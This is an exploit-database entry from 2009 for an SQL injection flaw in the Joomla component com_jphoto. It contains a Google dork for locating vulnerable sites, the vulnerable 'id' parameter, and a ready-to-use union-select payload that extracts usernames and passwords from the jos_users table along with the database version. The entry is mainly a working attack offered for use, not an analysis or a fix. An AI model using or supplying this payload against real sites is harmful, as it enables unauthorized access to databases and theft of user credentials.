Joomla Component com_jphoto SQL Injection Vulnerability

2009-12-10T00:00:00
ID 1337DAY-ID-10187
Type zdt
Reporter kaMtiEz
Modified 2009-12-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
Joomla Component com_jphoto SQL Injection Vulnerability - (id)
==============================================================

##########################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.corephp.com/
[+] About : http://www.corephp.com/jphoto/about.html
[+] Dork : inurl:"com_jphoto"
[+] LOCATION : INDONESIA - JOGJA
[+] price : -
 
##########################################################################
 
[ HERE WE GO ... LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://server/index.php?option=com_jphoto&view=category&id=[INDONESIANCODER]
 
[ Exploit ]
 
-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--
 
 
##########################################################################



#  0day.today [2018-01-10]  #